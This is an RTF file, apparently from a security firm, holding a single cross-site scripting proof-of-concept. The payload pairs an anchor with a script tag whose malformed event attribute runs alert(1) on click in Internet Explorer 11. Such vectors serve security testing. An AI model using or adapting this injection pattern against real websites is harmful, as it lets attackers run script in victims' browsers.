{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf400
{\fonttbl\f0\fnil\fcharset0 HelveticaNeue;}
{\colortbl;\red255\green255\blue255;\red16\green18\blue20;\red243\green246\blue249;}
{\*\expandedcolortbl;;\cssrgb\c7843\c9020\c10196;\cssrgb\c96078\c97255\c98039;}
{\info
{\author J.R. Myers}
{\*\company nVisium}}\margl1440\margr1440\vieww15460\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl320\partightenfactor0

\f0\fs28 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 <a href=# name=x id=x>Click me on IE11</a><script event="onclick(blah)<wtfbbq>\{\}" for=x>blah.view.alert(1)</script>}